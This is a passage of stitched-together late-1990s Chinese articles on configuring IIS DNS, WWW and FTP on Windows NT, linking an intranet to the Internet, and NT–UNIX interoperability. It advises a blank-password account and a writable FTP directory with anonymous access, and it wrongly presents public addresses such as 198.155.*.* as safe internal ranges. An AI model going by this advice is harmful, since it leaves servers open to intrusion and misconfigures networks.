     选择com，单击右键，在弹出菜单中选择“新建域”，在对话框中输入 lanhome，建立 com 下的 lanhome 域。选取 Heatch 域，单击右键，在弹出菜单中选择“新建主机”，在“新建主机”对话框中输入主机名 WWW 和主机的IP地址199.168.1.10；确定后输入主机名 FTP 和主机的IP地址199.168.1.11。确定后关闭，www.lanhome.com、ftp.lanhome.com建立完成。
     验证：打开浏览器，在地址栏中输入www.lanhome.com，是不是出现一个有关IIS的页面？
     3、配置WWW服务器
     我们在C:\InetPub\wwwroot文件夹中建立了一个lanhome文件夹，并将本网站的所有页面复制到了其中（在后面的叙述中，这个文件夹还是我们 FrontPage 98网站的目录），在这里，我们把它作为WWW服务器的主目录。
     依次选取“开始”/“程序”/“管理工具（公用）”/“Internet服务管理器”命令，出现一个“Microsoft Internet Service Manager”窗口，其中列出了当前正在进行的 Internet 服务。
     双击“WWW”服务，进入“Web_Server 的 WWW 服务属性”窗口。在属性对话框中选择“目录”标签，单击“添加”按钮，在“目录属性”对话框中单击“浏览”按钮，找到或直接输入C:\InetPub\wwwroot\lanhome，选择“主目录”项，选中“虚拟服务器”项，在下面的IP地址栏中输入WWW服务器的IP地址199.168.1.10，同时选中“访问”栏中的“读取”和“执行”两项。确认后回到“目录”对话框，可以看见“启用默认文档”一栏中是 default.htm（可以改为自己需要的默认文档名），一般不选取“允许目录浏览”。
     验证：打开浏览器，在地址栏中输入www.lanhome.com，是不是出现一个“蓝网之家”的主页面？
     4、配置FTP服务器
     我们在C:\InetPub\ftproot文件夹中建立了一个public_html文件夹，用于用户上传个人主页。
     依次选取“开始”/“程序”/“管理工具（公用）”/“Internet服务管理器”命令，出现一个“Microsoft Internet Service Manager”窗口，其中列出了当前正在进行的 Internet 服务。
     双击“FTP”服务，进入“Web_Server 的 FTP 服务属性”窗口。在“目录”中添加 C:\InetPub\ftproot\public_html，并选取宿主目录，在“访问”栏中选择“可写”；切换到“信息”标签，在“欢迎信息”和“退出消息”栏中分别输入进入FTP时欢迎辞和退出FTP时告别语；在“服务”选项卡中还可以指定匿名用户名和口令。
     验证：在MS－DOS方式下输入：ftp ftp.lanhome.com，接下来系统要求提供用户名和口令，系统默认的用户名是anonymous，口令是电子邮件地址。如果一切正确，则可以看见刚才输入的欢迎词辞了。

     有关FTP服务器的配置信息，请参阅《FrontPage 98网站FTP到NT服务器》

   三、FrontPage 98 网站的上传

     在《FrontPage 98网站FTP到NT服务器》一文里主要讲了在 IIS 中设置 FTP 服务器及在 FrontPage 如何上传的方法，在这里，我们除对其做出补充外，还将介绍如何通过 AceFTP 来上传主页。
     首先，必须为每个用户创建一个帐号，并设定密码，以供他们上传、更新自己的个人主页。步骤如下：
     依次选取“开始”/“程序”/“管理工具（公用）”/“域用户管理器”，在“域用户管理器”中创建一个新用户，在这里除按常规要输入用户名和密码外，不能忽略的是必须给该帐号以拨入权限而不仅限于普及的访问权限——单击“拨入”按钮，进入“拨入信息”对话框，选取“给予用户拨入权限”。本例中用户名为 heatch ，密码为空，允许拨入权限。
     关于通过 AceFTP 上传个人主页到服务器的方法，具体可以参阅《》一文，但在这里要补充的是，由于 FrontPage 在建立和管理网站时会产生一些自身使用的系统文件夹，里面保存着页面更新消息，而其实际在发布时并不需要，所以，不能简单地直接将 FrontPage 编辑目录中的所有文件上传到服务器上——因为那些系统文件夹并不可见，所以，可以先在 MS-DOS 方式下，用 XCOPY /S 命令将 FrontPage 网站复制到另一目录，再行上传。在本例中，我们为 Heatch 在 Public_html 中创建了一个文件夹 Heatch ，并上传其 FrontPage 网站的页面到该目录中。
     FTP目录准备就绪，接下来讲讲在WWW服务器中对其进行配置。进入“Internet服务管理器”，双击“ WWW 服务 ”选取“目录”标签，单击“添加”，浏览或直接输入C:\InetPub\ftproot\public_html\heatch文件夹，接下来选取“虚拟目录”项，在“别名”栏中输入“/～heatch”，设为可执行，确认后退出。
     验证：打开浏览器，在地址栏中输入www.lanhome.com/~heatch，是不是出现了一个富有个人特色的新页面，是不是跟俺自己的个人主页地址一模一样：http://go.163.com/~lanhome？
     那么，这里的 best.163.com 中的 best 是如何来的呢？我们如何配置它呢？方法很简单，在 DNS 中添加一个服务器即可。
     进入“域名服务管理器”，选取 lanhome.com ，右键单击，在弹出菜单中选择“新建主面”，在主机名一栏输入 heatch ，IP地址为199.168.1.12；
     进入“Internet 服务管理器”，双击“ WWW 服务 ”选取“目录”标签，双击我们在上面建立的 C:\InetPub\ftproot\public_html\heatch项，但现在要将它设置为主目录，接下来激活“虚拟服务器”选项，在下面的IP地址栏中输入 199.168.1.12 即可。
     验证：打开浏览器，在地址栏中输入heatch.lanhome.com，看看，是不是感觉又很不一样？

返回


Intranet接入Internet的技术要点

《一键清理系统垃圾》

Intranet接入Internet的技术要点

    两个星期来一直忙于找一家单位的做事，时时关心报纸上的招聘信息和网上的人才热线。8月的广州IT业界需求最多的是业务员，接下来是技术员，非IT企业对IT人才的需求则主要集中于网页的制作与网络的管理。对于后者，一般要求熟练Windows NT管理，并希望在适当地时候将Intranet接入Internet，以实现新闻发布、产品演示、市场调查、接受订单等功能。那么，将现有的Intranet连入Internet是否可行，在技术上有何要求呢？下面将自己的经验给大家说一说，一家之言，难免有所疏漏和偏颇，只希望对大家有点启发罢了。

     一、构建Intranet

     我们先通过Windows NT Server 4.0的IIS（Internet Information Server）来构造一个Web站点，因为IIS界面直观、方便，并提供的WWW、FTP、Gopher等服务，当成为我等首选。

    （一）安装IIS 2.0

     检查系统是否已经安装IIS 2.0，在“控制面板”的“服务”中有一个列表，若已存在则跳过此步。
     以管理员的身份进行登录，按下“添加”按钮以添加新的服务程序，在“选定网络服务”对话框中选择“Microsoft Internet Information Server 2.0"，按“确定"进行安装。注意要选定“Internet服务管理器（HTML）"，以支持后面的管理操作。其它所有安装操作按默认方式进行即可。安装完成后，开始菜单里就多了一个“Microsoft Internet Server（公用）"组，接下来，我们看一下如何配置WWW。
    在“Internet服务管理器”中选定WWW服务器后，按“内容”按钮则弹出WWW的服务属性窗口。该窗口共有服务、目录、纪录和高级四项，多数选项采用系统默认值即可，其中值得注意的是服务项中的“匿名登录”组，对于用户名和密码两个子项不要随便修改，否则可能导致客户访问失败。在“密码证明”组中选定“允许匿名”以允许用户匿名访问。对于“目录"组，我们可以根据需要随时进行培养、修改设置，尤其是对主目录“Home”。实际上，当我们连接到Web时，IIS自动调用主目录下的default.htm文件（自不消说，可以在默认文档中指定其它的缺省文件名）。这时，我们可以选取“添加”按钮来增加新的目录，系统弹出目录属性对话框后，便可以更改主目录和虚拟目录了。接下来我们可以通过指定机器的IP地址来记录客户在我们的Web上访问数据的情况，也可以拒绝网络上某台计算机对我们的Web的访问。

     （二）设置IP地址

     随着网络渐入佳境，各类IT媒介IP地址的介绍很多，因此，这里就不多说（但笔者有一篇关于如何计算IP地址及子网掩码的文章，自认为还可一读，方便的读者可访问http://lanhome.363.net）。对于一个局域网来说，只要保证网内每台机器的IP地址不重复即可，但对作为服务器的那台机器，则应该指定一个固定的IP地址以供其它机器访问。IP地址配置是否成功可以在网络中的其它计算机上通过“PING IP地址"命令来检验。

     （三）安装DHCP

    DHCP的安装与IIS安装基本相同，程序组里管理工具（公用）中会增加了一项DHCP管理器表明安装成功。初次使用DHCP时要创建一个DHCP域，即一个IP地址群，也即是一个地址范围。选择“作用域”/“创建”为用户指定一段IP地址：输入起始和结束的IP地址。你也可以在排除范围中指定部分地址保留备用，或通过租用期限等项目来进行更复杂的设置。接下来，我们就可以在Windows NT Server、Windows NT Workstation、Windows 95/98设置客户端的IP地址了，即在TCP/IP属性菜单中设置其允许DHCP。重新启动工作站后，直接输入IP地址就可以访问Web服务器了。如果觉得数字形式的地址使用起来不方便，我们可以安装DNS域名服务来进行全面管理或使用在“Internet服务管理器"中设定的目录别名。

     二、选择Internet接入方案

     对我们普通用户来说，一般采用双绞线接入技术，通常还有光缆接入技术和无线接入技术两种。
     对于双胶线接入技术，我们可以有以下几种选择：
     DDN(数据专线)接入：目前应用最广，接入速率从64kb/s、128kb/s到E1(2Mb/s)和E3(34Mb/s)。
     ISDN(综合业务数据网)接入：目前应用较广并日益成为首选，其两条B通道合并使用可提供128Kb/s的接入速率，更多的(30)B通道合并使用速率可达2Mb/s。
     单线(普通电话线路)接入：即我们这些网虫们所正使用的，用于普通用户上网浏览。利用现有电话线路，采用PPP方式上网，理论接入速度最高33.6Kb/s到56Kb/s，当然，实际上可能永远达不到这个标准。

     接下来是对ISP的选择。
     电信部门可提供到CHINANET（中国公用计算机互联网）的接入服务，信息中心则可提供到CHINAGBN（金桥网）的接入服务。需要考虑的因素大致有：(1)本单位需要上网浏览/收发电子邮件的人数，(2)是否对外提供服务及服务时长，(3)是否提供WWW服务，WWW服务的对象是否有区别，(4)ISP可提供的接入方式和接入速率，(5)ISP自身接入Internet主干网的技术方式和速率，(6)ISP的服务质量和收费标准。

     三、路由器的选择

     1、专用路由器
     通过DDN专线接入Internet时，一般需要配置一个专用路由器。
     路由器可根据用户的实际需要来选择。如果需要在网上大量发布信息，可以选用登录服务器作为路由器。这类产品一般都有一个AUI Ethernet接口用来连接Intranet，一个Dual 5 in l同步串行口用来连接DTU到DDN专线，一般还具有8个RJ-45端口，允许工作站从此处直接连入Internet。
     2. NT RIP软路由
     以NT Server 4.0组网的Intranet在接入Internet时，NT Server 4.0中的路由信息协议(RIP)可以用来实现路由功能。RIP路由协议需要安装在一台运行NT Server 4.0的服务器上，在该服务器上安装两块网卡，一块用于连接Internet，另一块则连接到Intranet的HUB上。以这种方式接入Internet时，整个Intranet都将通过代理服务器才能访问Internet。
     某些用户甚至打算使用PPP点对点拨号方式将小型的Intranet甚至普通NT局域网接入Internet。此种利用NT RAS远程存取服务功能上网的方式有明显的缺点，主要是速度慢(尽管可多接到4个Modem)和连接不稳定，但费用要远少于前两者。Intranet网内用户可以在网上浏览，可以收发电子邮件，但由于ISP提供给PPP拨号用户的是动态分配的IP地址，因此这种方式下不能做WWW信息发布等工作。

     四、代理服务器

     在将Intranet接入Internet的工作，代理服务器担任很重要的角色，它在提供给Intranet网络用户访问Internet能力的同时，还将控制Intranet与Internet之间的信息交换，提供一些防火墙功能，现在常见的可用于NT系统的代理服务器产品有Micro Proxy Server2.0,WinGate 2.1和Winproxy 1.0等。
     1、MS Proxy Server 2.0
     MS Proxy Server 2.0是一种需要与NT Server 4.0(Service Pack3)和IIS 3.0配合使用的一种代理服务器。它应安装在位于Intranet到Internet连接点上的NT服务器上。其安装过程比较简单，用户需要设置内容缓冲服务器的位置和大小，创建本地地址表和设定用户(组)的访问权限等。
安装完成后，用户可以利用NT Server内置的Internet ServiceManager来管理代理服务器，用户可以看到ISP的管理窗口中的服务数从原来的3个增加到6个，新增的是Web Proxy, WinSock和Sock服务。由于SOCK是供非Windows客户机使用的，Winsock是为Netshow、IRC、RealVideo和RealAudio等提供支持，用户可以选择关闭这两项服务，如同我们可以关闭Gopher服务一样。
     在MS Proxy Server 2.0提供的诸多功能中，网络管理员最关心的是它的代理服务和如何控制对Internet的访问。管理员可以为Intranet内客户机分配一组在Internet是非法的地址，(如198.155.*.*，可能是美国或是其他地区的IP地址段)，这样Intranet内的用户如不通过代理服务器是不可能从Internet上下载任何信息的，从而限制网内用户必须通过代理服务器访问Internet；这样做的另外一个好处就是Internet上的用户也无法访问Intranet内部的主机。MS Proxy Server 2.0还提供了内容缓存服务，用户从Internet下载的信息在指定缓存区内(一般置为100MB)缓存，这样如果Intranet内的其他用户访问同一内容(网页)时就可以从内容缓存区内提取。由于Intranet内用户的兴趣通常比较接近，会经常访问一些特定的站点，因而内容缓存技术可以避免重复下载，明显地减少下载量和提高访问速率。网络管理员还可以通过MS Proxy Server设定单个或一组用户对Internet访问权限，例如可以将名为Internet组的所有成员授予访问权，这样今后如需调整网内用户访问Internet的权限时，只需将该用户加入或退出Internet组即可。
     MS Proxy Server 2.0防火墙功能可以管理Intranet内对外部的访问，可以许可或禁止某一(组)用户对某一些站点进行访问，但是还无法做到能够指定某一用户(组)可以访问所有的站点，而另一组用户只能访问与其工作有关的站点。为了保护intranet不受外界访问，用户可以在本地地址表(LAT)中罗列内部网络需要代理服务器保护的IP地址。同时由于内部IP地址已事先分配为Internet上非法的地址，两种保护措施合为一体可以有效地隔绝可能来自外部的入侵。

     2、WinGate和Winproxy

     WinGate是另一种常见的代理服务器软件，有分别用于Win95和NT，用户数有5用户、10用户和无限制等多种版本，用户选购时要根据自己的具体情况选择。
     WinGate 2.1b的功能稍强于MS Proxy Server 2.0，它不会强求NT4.0 Pack3和IIS 3.0，它甚至可以提供DHCP、DNS、FTP代理和POP3代理等，但笔者对其最感兴趣的是其用户权限管理和多种计费功能。WinGate的用户权限管理将访问Internet的用户分为3组：不受限组 -可以不受限制地访问Internet；预定用户-用户事先要在WinGate的Location中登记要访问的IP地址，用户对外只能访问其预定的若干个网站，否则即视为非法；需要认证用户-每次必须登录WinGate，认定其权限后才可访问Internet。这种对可访问Internet的用户进行分组管理的做法，使得网络管理员可以根据单位内部的具体情况对不同的用户(组)授予不同的权限，从而有效地利用网络资源。
     计费功能对网络管理员来说也是较为重要的功能。Wingate提供了按时间和按流量等多种可组合的计费方式，有助于管理员掌握每个用户对Internet的访问情况，及时制止非业务性的过度访问。与WinGate不同，Winproxy是另一种较简易的代理服务器，有安装方便设置简单等优点，但所提供的功能较少，防火墙也较简单。

     五、IP地址的设置、DHCP协议和DNS服务

     TCP/IP协议是Internet/Intranet网络的技术基础，出于对Intranet保护的需要，Intranet内部大多数主机的IP地址应明显有别于Internet范围接入点ISP网段和IP地址，如ISP网段的IP地址为202.95.112.*，则Intranet内部的IP地址范围可选为198.155.1.*或是其他网络管理员指定的地址范围。对于需要安装代理服务器、DNS服务器、邮件服务器和对外发布信息的Web主机则必须再拥有一个Internet空间的IP地址，这样的主机需要安装两块网卡，一块对应于Internet的IP地址，另一块对应于Intranet内部的IP地址。
     对于较小型的Intranet网络，只需向ISP申请一个Internet的IP地址，然后将上述的诸多服务器安装在同一台NT服务器上，使该台服务器兼做多项服务。同时由于网络内部的信息交换量很大，可以设置一个专门对内的Web服务器，该主机只需也只能分配一个内部的IP地址，以防范来自外部Internet入侵。
     图4还显示了各种服务器的安装情况，这种将多个服务器以及协议安装在一台主机上的方案，确实加重了主服务器的负担，用户因此应选用高性能的专用服务器(双CPU、内存128MB)。图中除代理服务器和邮件服务器需另购软件安装之外，其他协议和服务均为NT Server 4.0Pack3的组件，用户从控制面板中安装RIP协议、DHCP协议和DNS域名服务。DHCP动态主机配置协议将负责完成Intranet网络中各客户机的IP地址的动态分配，但要预留一些供服务器等主机使用。DNS域名服务器负责实现主机名对IP地址的静态解析，当Intranet内部有多个Web服务器或其他应用服务器时，域名服务将有助于网络的管理和运行。如果Intranet内对外部的服务扩展后，也有多个Web服务器或应用服务器时对外提供服务时，并且已向有关部门申请了三级域名之后，DNS域名服务器将承担解析内部四级域名的工作。

     六、邮件服务器

     E-mail邮件服务是Internet中最早和最基本的服务，一般ISP会提供给专线上网的用户多个邮箱，但即使是这样，对一个较大的Intranet网络而言，也会出现邮箱不够分配的情况，此时就需要自己设置邮件服务器，才能解决内部的邮箱需求。
     NT系统中最常用的邮件服务器是MS Exchange Server 5.0，是BackOffice套件的一部分，它支持POP3协议，也支持Usnet新闻组及具有新的可编程表格的能力。其他厂家的邮件服务器有Mercur(SMTP/POP3/IMAP3)Server 3.0和Post Office 3.5等。

返回


MS Windows NT操作平台：与UNIX的企业互操作性(M$)

《一键清理系统垃圾》

MS Windows NT操作平台：与UNIX的企业互操作性(M$)

关键词：NT

网络连接和服务

互操作性的第一个层次是在网络中有能相互操作的计算机。这就是说计算机必须使用相同的协议并且必须有某些方法识别网络上的资源。

在基于 Microsoft Windows? 的 PC 和 UNIX 工作站之间实现最基本的集成需要两个环境之间有可靠的网络连接。Windows NT 通过内置的 TCP/IP 这一 UNIX 环境中使用的网络传输协议标准套件支持提供了这一基础。由于具有 TCP/IP 支持，基于 Windows NT 的服务器能够天然地在企业网络和 Internet 上与 UNIX 系统通讯。对诸如域名系统 (DNS)、动态主机配置协议 (DHCP)、BOOTP 和远程过程调用 (RPC) - 基于 TCP/IP 的企业网络的积木式组件 - 之类服务内置支持能确保基于 Windows NT 的服务器能够提供必要的基础结构以部署和管理这些网络。

基于 Windows NT 和基于 UNIX 的系统使用共同的 TCP/IP 基础结构的另一个好处是支持诸如 FTP、HTTP 和 Telnet 之类的服务。通过 FTP 和 HTTP 服务，用户能够跨异机种系统网络复制文件，然后把它们当作文本文件甚至作为 Microsoft Word 文档在本地操作。除复制 UNIX 文件外，PC 用户还能够通过 Windows NT 远程登录支持访问基于字符的 UNIX 应用程序。通过运行 Windows 95 和 Windows NT 操作系统内置的终端仿真软件，基于 Windows 的 PC 用户能够以一种类似拨号连接的方式登录到 UNIX 分时服务器上。输入授权的用户名和密码后，PC 用户能够使用远程 UNIX 工作站上的基于字符的应用程序，就好象直接登录到系统上一样。

PC 用户能够在不同显示窗口运行的应用程序之间操作数据，即使数据是由不同的操作系统上的应用程序生成的也是如此。例如，设想一个用户使用一个 X Windows 仿真程序包从运行 Windows 的台式机访问 UNIX 工程程序包。有几种 X Windows 仿真解决方案（例如 Hummingbird Communications 和 WRQ 提供的那些）可以满足这种用户的需求。这样用户可以从在 UNIX 系统上运行的应用程序显示、选择并剪切一个图纸，并把那个数据粘贴到基于 Windows 的应用程序（例如 Microsoft Word for Windows）中。例如，技术文档可能在一个工程组中编写，一些重要数据在 UNIX 系统上并由 UNIX 应用程序管理，但有些文档是在 Windows NT 工作站上使用 Microsoft Word for Windows 编写的。

大部分 UNIX 系统和 Internet 上使用 DNS 将名称解析为 Internet 地址。从本质上来说 DNS 是 TCP/IP 网络上的一套协议和服务，能使网络用户在查找其它计算机时使用对用户友好的分层次的名称，而无须记 IP 地址。

例如，假设 Microsoft 的 FTP 站点的 IP 地址是 157.55.100.1。大部分人会通过指定 FTP.microsoft.com 而不是不那么好记的 IP 地址访问到这台计算机。除了更容易记起外，名称还更可靠。数字地址可能由于多种原因而更改，但单词能够始终使用。如果您在 Internet 上用过 Web 浏览器、Telnet 应用程序、FTP 工具或其它类似的 TCP/IP 工具，您就可能使用过 DNS 服务器。

Windows NT Server 4.0 有一个基于标准 (IETF RFC 1053) 的内置 DNS 服务。由于 Windows NT Server 4.0 中的 DNS 是基于 RFC 标准的，系统管理员可以很容易地从他们现有的 DNS 迁移至 Windows NT Server DNS，或与非 Microsoft DNS 共存。

Windows NT 4.0 Server DNS 服务提供了一个 Windows Internet 命名服务 (WINS) 查找功能。WINS 在基于 Windows NT Server 的网络中动态管理网络资源的友好的名称和 IP 地址之间的映射。例如，如果名称不能使用 DNS 解析，名称请求就会被转发至 WINS 来解析。作为 Windows NT Server DNS 服务的一部分提供的 WINS 查找功能免除了一些与当前网络 DNS 系统有关的手动名称和地址跟踪管理任务，从而降低了管理费用。

这种形式的名称解析只在计算机运行启用 DNS 和 WINS 的 Windows NT Server 的网络上才有。

有关 DNS 和 WINS 集成的完整讨论，参见 Microsoft Windows NT Server 4.0“Networking Supplement”中的第 3 章“Implementation Considerations”。

在大型分布式计算环境中工作的挑战之一是标识和查找资源（例如用户、组和文档）。目录服务提供了查找和标识系统中可用用户和资源的方法。

大部分企业已经有许多目录。例如网络操作系统、电子邮件系统和组件产品都有自己的目录。因此每个系统都有一个 API 集合用于访问和管理目录。一个企业部署多个目录时会出现许多问题，包括可用性、数据一致性、开发费用和支持费用。

Active Directory 服务接口

Microsoft 开发了 Active Directory 服务接口 (ADSI)，以便于开发人员使用高级工具（例如 Microsoft Visual Basic? 编程系统、Java、C 或 Visual C++? 开发系统）编写支持目录的应用程序。这样开发人员就无须担心不同名称空间之间存在的不同。

例如，有了 ADSI，UNIX 开发人员就可以创建这样的应用程序：只要有合适的服务提供程序可用，这些应用程序就可以用单一接口枚举和管理基于 LDAP、基于 X.500、基于 NDS、基于 Notes 和基于 Windows NT 的目录。一个 ADSI 提供程序为特定的名称空间维持对象和独立对象的实现。有了 ADSI，客户只需关心获取和使用对象的接口，而无须关心对象的软件在哪里以及如何实现的。

用户和独立软件供应商可以下载 Active Directory 服务接口 (ADSI) 软件开发工具包 (SDK)。Microsoft 还实现了用于 Java 的 ADSI，这样便易于用 Java 编写目录管理应用程序。

Microsoft 很注意与 UNIX 系统互操作情况下的异机种安全性。例如，Microsoft 将为 UNIX 提供与 Windows NT 服务的单向，已加密密码同步。这个附件包可使 Windows NT 工作站的用户登录到基于 Windows NT 的域并获得位于 UNIX 服务器的文件资源的访问权限，而系统不会提示您输入另一个用户 ID 和密码。用于 UNIX 的 Windows NT Services 目前正在进行 Beta 测试。详细信息请看新闻发布。

Advanced Server for UNIX (ASU) 进一步扩展了 Windows NT 和 UNIX 之间的互操作性。例如，它可为 UNIX 提供完全的 Windows NT 域控制器支持。. UNIX 系统在 Windows NT 环境中既可以是主域控制器也可以是备份域控制器。这就是说用户可以一次登录到 Windows NT 网络并可访问网络上的分布在 UNIX 服务器和 Windows NT 服务器上的资源。AT&T 将 ASU 技术几乎许可给所有主要的 UNIX 提供商专用，例如 Compaq?、Hewlett-Packard、Data General、Fujitsu-ICL 和 Siemens-Nixdorf。

Advanced Server 支持 Windows NT 文件权限和本地及全局组权限。当基于 Windows 的客户访问 UNIX 服务器上的磁盘共享或打印共享时，UNIX 服务器对照 Windows NT 权限检查用户访问权限。或者，您可以使用户通过两个级别的权限（第一个是 Windows NT，然后是 UNIX）以便提高安全性。ASU 还支持 Windows NT 本地和全局组，这样能够更容易地分割跨 Windows NT 和 UNIX 资源的用户访问。

Compaq 已经给用于 DIGITAL UNIX 产品的 Advanced Server 添加了密码管理工具。这个工具帮助用户管理他们的 UNIX、NIS 和 Windows NT 密码以帮助保持这些密码同步。当 Windows 95 或 Windows NT 用户更改他们的 Windows 网络密码时，他们也可以让密码更改影响他们的 DIGITAL UNIX 或网络信息服务 (NIS) 密码。

安全支持提供程序接口

Microsoft 安全支持提供程序接口 (SSPI) 是一个定义明确的公用 API，用于开发采用任何分布式应用程序协议的用来保证身份验证、消息完整性、消息保密性和服务安全质量的集成安全服务。应用程序协议设计人员可以利用这个接口编写不同的安全服务而无须修改协议本身。

Windows NT 5.0 版本身集成了诸如 Kerberos 身份验证、公钥加密技术、数字证书支持、文件本身的加密和智能卡支持之类的安全技术。

信息访问

互操作性的下一个层次是在异机种环境中能实现信息访问。这就意味着在邮件环境间也能互操作，使得用户可以访问文件共享和打印机，而与服务器环境无关。

对所有重要协议的全面和广泛的支持是 UNIX 和 Windows NT 上消息传递系统间无缝互操作的关键。Microsoft Exchange Server 5.5 版支持如下必要的协议：

Exchange Internet 邮件服务 (IMS) 是一个全功能简单邮件传输协议 (SMTP) 邮件服务器。消息可以在 Microsoft Exchange Server 和任何基于 UNIX SMTP 的邮件服务器之间发送。IMS 包括许多高端功能，包括阻止“邮件滥发”和未经请求的商务电子邮件 (UCE) 的功能。IMS 还支持 SMTP 扩展，例如 extended turn (ETRN), 它在提取 Internet 服务提供商保存的邮件时很重要。
Exchange Internet 新闻服务器 (INS) 支持网络新闻传输协议 (NNTP) 新闻发布站之间的双向交换。把消息张贴到 UNIX 服务器主持的新闻组的用户可以把消息提供给 Exchange 服务器，消息在那里保存在公用文件夹中。Exchange 用户可以张贴到公用文件夹，在这种情况下他们的消息可以使用 NNTP 送到 UNIX 服务器上的新闻组。
Exchange Information Store 通过一系列协议（包括 MAPI、POP3、IMAP4 和 HTTP 或 HTML）支持客户访问。UNIX 本身没有 MAPI 客户程序，但可以使用原始的 POP3 或 IMAP4 客户程序直接与 Exchange 服务器上的邮箱连接。消息内容按原始格式提供给客户，不需要转换。
Outlook Web Access (OWA) 这个由 Microsoft Windows NT Server Internet Information Server (IIS) 服务执行的服务器端应用程序，能使在 UNIX 工作站上运行的 Web 浏览器访问 Microsoft Exchange Server 邮箱、公用文件夹和日历。浏览器必须能够支持框架和 Java 或 Visual Basic 脚本。在这种配置中，组成 OWA 应用程序的一套活动页所包含的代码在服务器上执行，结果被转换成标准 HTML 并发送回浏览器显示。
SSL（安全套接字层）可以用于保护客户和 Microsoft Exchange Server 之间连接的安全。SSL 可用于安全的 HTTP、POP3、IMAP4 和 LDAP 连接。Exchange 限制将 TCP/IP 端口用于客户连接，所以通过防火墙的受控制的访问得到完全的支持。
Microsoft Exchange Server 5.5 支持 S/MIME 数字签名和加密。这就是说配有一套 S/MIME 密钥（例如 http://www.verisign.com 颁发的那些密钥）的任何人都可以给收件人发送签名的或加密的邮件，无论他们连接到 Exchange 还是 UNIX 邮件服务器。我们还提供客户扩展以使 Exchange 客户程序（例如 Microsoft Outlook? 消息和协作客户程序）使用基于 PGP 的加密。

有了这么一些协议，可以将 Microsoft Exchange Server 连接至 UNIX 消息传递环境，或者可以将用户从 UNIX 邮件服务器迁移至 Exchange。在后一种情况下，用户可以继续使用相同的客户程序。Exchange 资源工具包中包括用于发送邮件类型的系统的移动邮箱内容的迁移工具。

经常在 UNIX 和 Microsoft 环境间共享文件的用户觉得标准文件传输协议太麻烦。他们还可以有其它方法：服务器消息块 (SMB) 和网络文件系统 (NFS)。

SMB 当维持与现有 UNIX 系统的连接采用 Windows NT 作主操作平台时，面向 Microsoft 的方法通常是更好的选择。在这种情况下，用于 UNIX 的 Windows NT 网络解决方案 (SMB)，例如 Compaq 的 Advanced Server for UNIX 产品能够实现从运行 Windows NT 的台式机到 UNIX 文件的访问。
NFS 所有主要的 UNIX 操作系统（包括 DIGITAL UNIX）都有内置的 NFS 文件共享功能。用户在把 Windows NT 添加到 UNIX 是主操作平台的环境时很可能会使用 NFS。NFS 作为使运行 Windows NT 的台式机访问 UNIX 系统上的文件或使 Windows NT Server 与 UNIX 台式机共享文件的一种手段，也很可能对 UNIX 用户来讲已经是很熟悉了。
网络文件系统

NFS 能使用户安装远程目录和磁盘，这样它们看起来就象本地驱动器一样。所有主要的 UNIX 操作系统 - 包括 DIGITAL UNIX - 都有内置 NFS 文件共享功能。

使用 NFS 在 UNIX 和 Windows NT 操作平台之间共享数据

用于 Windows 操作平台的 NFS 有两种类型。用于 Windows、Windows 95、Windows 98 和 Windows NT 操作环境的 NFS 客户产品能使客户机访问位于 UNIX 服务器上的文件和打印机。NFS 服务器产品 - 最常用于 Windows NT Server 环境 - 能使 UNIX 工作站和服务器访问位于运行 Windows NT 的系统上的文件和打印机。

Microsoft 在 Windows NT Services for UNIX 附件包中提供了 NFS Server 和 NFS Client 软件。这个附件包还有其它有用的功能，包括单向密码同步，25 个以上的 UNIX 脚本命令和 UNIX Korn Shell。单向密码同步能使用户在基于 Windows NT 和基于 UNIX 的机器之间使用一个公用密码。UNIX 脚本命令和 Korn shell 能使用户跨 Windows NT 和 UNIX 自动执行常见的过程和管理任务。想要在运行 Windows 95 或 Windows 98 的台式机上安装 NFS 的用户可以利用第三方供应商（例如 Hummingbird、WRQ 和许多其他供应商）的产品。

大部分提供用于 Windows 的 NFS 产品的供应商已经把 NFS 集成到 PC 台式机。PC 用户可以从 Windows 资源管理器、“我的电脑”或 Windows 文件管理器访问 NFS 共享。用户可以浏览他们的 NFS 目录树查看可以安装的文件共享。大部分工具也支持 UNC 格式（例如 \\system\sharename）以映射 NFS 网络驱动器。

NFS Gateway

用于 Windows NT 的 NFS Gateway 是许多供应商最近提供的产品。方法是非常简单的：将 NFS Gateway 软件装载在 Windows NT 服务器上。服务器使用 NFS 在 UNIX 上安装文件和打印资源，然后使用 SMB 协议与 Windows NT 社区重新共享这些资源。网关对 UNIX 系统而言看起来就象带有终端访问文件的另一个 UNIX 系统。UNIX 系统上不需要其它软件，UNIX 系统管理员维护文件级的安全，Windows NT Server 系统管理员控制到连接的访问。Windows NT Services for UNIX 的第一版不包括 NFS Gateway，但附件包的第二版将包括。

与 Microsoft Windows 联网

有许多基于 SMB 协议的产品提供 NFS 样式的文件和打印共享的替换方法。这个方法通常用在基于 Windows NT 的站点（这种站点正要扩展并把 UNIX 服务器添加至基于 Windows NT 占主导地位的系统环境中），或想要在 Windows NT 样式的文件和打印服务上标准化的 UNIX 站点。SMB 提供从现有 UNIX 服务器数据库的平稳转换，因而能使许多单位利用他们在硬件、软件和技能的所作的投资。

在 UNIX 和 Windows NT 之间共享数据

通过在 UNIX 服务器和工作站上运行 SMB 协议，UNIX 系统能够访问由 Windows NT Server 管理的文件。但使用基于 Windows 的客户程序访问 UNIX 服务器上的文件更为常见。UNIX 上的面向 Windows 的联网产品包括从叫做“Samba”的免费软件端口，到 Microsoft 许可的 Advanced Server for UNIX，到独立软件产品（例如 Syntax Corporation 的 TotalNET Advanced Server 和 SCO 的 VisionFS 产品）。

由于 UNIX 产品上的 SMB 协议作为服务器实现以支持原始的 Microsoft 客户程序，在基于 Windows 的客户机上不需要其它软件。相反，软件在集中管理的 UNIX 服务器上安装、配置和管理。

UNIX 应用程序上的 SMB 协议能使最终用户访问 UNIX 服务器，其方法与他们从 PC 使用基于 Windows 的网络服务器非常相似。例如，用户双击“网上邻居”就会看到 UNIX 服务器和基于 Windows NT Server 系统一起显示。用户也可以浏览 UNIX 服务器查找可用的共享和打印资源，可以使用拖放操作在 Windows 95 资源管理器或 Windows for Workgroups 文件管理器把文件从基于 Windows 的共享移动到 UNIX 共享。

UNIX SMB 产品的管理都有很大差异，从“Samba”提供的以 UNIX 为中心的配置文件方法，到使用 Windows NT Server 中的默认管理工具的 ASU 管理方法，到 Syntax 的 TotalNET Advanced Server 的基于 Web 的接口。

什么是“Samba”？

“Samba”是一套协同工作的程序，可使客户机通过 SMB 访问服务器上的文件和打印机。“Samba”是以源代码形式分发的免费软件，在 DIGITAL UNIX 和大多数 UNIX 变体上运行。

